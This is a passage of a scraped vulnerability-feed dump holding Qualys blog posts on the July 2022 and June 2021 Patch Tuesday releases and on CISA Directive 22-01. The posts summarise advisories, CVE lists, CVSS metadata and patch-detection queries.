(Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation could lead to arbitrary code execution in the context of current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month&#x27;s Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities &amp; Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:22", "description": "### Microsoft Patch Tuesday \u2013 June 2021\n\nMicrosoft patched 50 CVEs in their June 2021 Patch Tuesday release, and five of them are rated as critical severity. Six have applicable exploits.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) \u2013 Microsoft Defender Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in its Defender product (CVE-2021-31985). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 7.8 by the vendor.\n\n[CVE-2021-31959](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31959>) \u2013 Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft released patches addressing a critical memory corruption vulnerability in the Chakra JScript scripting engine. This vulnerability impacts Windows RT, Windows 7, Windows 8, Windows 10, Windows Server 2008 R2, Windows Server 2012 (R2) and Windows Server 2016. An adversary can exploit this vulnerability when the target user opens a specially crafted file.\n\n[CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>) \u2013 Microsoft SharePoint Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE in SharePoint Server. This CVE is assigned a CVSSv3 base score of 7.1 by the vendor.\n\n#### Six 0-Day Vulnerabilities with Exploits in the Wild Patched\n\nThe following vulnerabilities need immediate attention for patching since they have active exploits in the wild:\n\n[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability \n[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability \n[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability \n[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability \n[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability \n[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n\n#### **Qualys QIDs Providing Coverage**\n\nQID| Title| Severity| CVE ID \n---|---|---|--- \n91768| Microsoft .NET Core Security Update June 2021| Medium| CVE-2021-31957 \n91769| Microsoft Visual Studio Security Update for June 2021| Medium| CVE-2021-31957 \n375614| Visual Studio Code Kubernetes Tools Extension Elevation of Privilege Vulnerability| Medium| CVE-2021-31938 \n110383| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities June 2021| High| CVE-2021-31966,CVE-2021-31965,CVE-2021-31964,CVE-2021-31963,CVE-2021-31950,CVE-2021-31948,CVE-2021-26420 \n110384| Microsoft Office and Microsoft Office Services and Web Apps Security Update June 2021| High| CVE-2021-31939,CVE-2021-31941,CVE-2021-31940,CVE-2021-31949 \n110385| Mcrosoft Outlook Remote Code Execution Vulnerability Security Update June 2021| High| CVE-2021-31949,CVE-2021-31941 \n91771| Microsoft Defender Multiple Vulnerabilities - June 2021| Critical| CVE-2021-31978,CVE-2021-31985 \n91772| Microsoft Windows Security Update for June 2021| Critical| CVE-2021-1675,CVE-2021-26414,CVE-2021-31199,CVE-2021-31201,CVE-2021-31951,CVE-2021-31952,CVE-2021-31953,CVE-2021-31954,CVE-2021-31955,CVE-2021-31956,CVE-2021-31958,CVE-2021-31959,CVE-2021-31960,CVE-2021-31962,CVE-2021-31968,CVE-2021-31969,CVE-2021-31970,CVE-2021-31971,CVE-2021-31972,CVE-2021-31973,CVE-2021-31974,CVE-2021-31975,CVE-2021-31976,CVE-2021-31977,CVE-2021-33742 \n91773| Microsoft 3D Viewer Multiple Vulnerabilities - June 2021| High| CVE-2021-31944,CVE-2021-31943,CVE-2021-31942 \n91774| Microsoft Paint 3D Remote Code Execution Vulnerability| High| CVE-2021-31983,CVE-2021-31946,CVE-2021-31945 \n91775| Microsoft Windows VP9 Video Extension Remote Code Execution Vulnerability| Medium| CVE-2021-31967 \n91777| Microsoft Windows DWM Core Library Elevation of Privilege Vulnerability - June 2021 | High| CVE-2021-33739 \n \n### Adobe Patch Tuesday \u2013 June 2021\n\nAdobe addressed 41 CVEs this Patch Tuesday, and 21 of them are rated as critical severity impacting Acrobat and Reader, Adobe Photoshop, Creative Cloud Desktop Application, RoboHelp Server, Adobe After Effects, and Adobe Animate products.\n\nAdobe Security Bulletin| QID| Severity| CVE ID \n---|---|---|--- \nAdobe Animate Multiple Security Vulnerabilities (APSB21-50)| 91770| Medium| CVE-2021-28630,CVE-2021-28619,CVE-2021-28617,CVE-2021-28618,CVE-2021-28621,CVE-2021-28620,CVE-2021-28629,CVE-2021-28622 \nAdobe Security Update for Adobe Acrobat and Reader( APSB21-37)| 375611| High| CVE-2021-28551,CVE-2021-28554,CVE-2021-28552,CVE-2021-28631,CVE-2021-28632 \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Patches_](<https://www.brighttalk.com/webcast/11673/491681>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * VMware vCenter Server Multiple Vulnerabilities\n * Ubuntu XStream Vulnerabilities\n * Microsoft Patch Tuesday, June 2021\n\n[Join us live or watch on demand](<https://www.brighttalk.com/webcast/11673/491681>)!\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-06-08T21:19:29", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (June 2021) \u2013 Microsoft 50 Vulnerabilities with 5 Critical, Adobe 21 Critical Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-26420", "CVE-2021-28551", "CVE-2021-28552", "CVE-2021-28554", "CVE-2021-28617", "CVE-2021-28618", "CVE-2021-28619", "CVE-2021-28620", "CVE-2021-28621", "CVE-2021-28622", "CVE-2021-28629", "CVE-2021-28630", "CVE-2021-28631", "CVE-2021-28632", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31938", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31942", "CVE-2021-31943", "CVE-2021-31944", "CVE-2021-31945", "CVE-2021-31946", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31957", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31963", 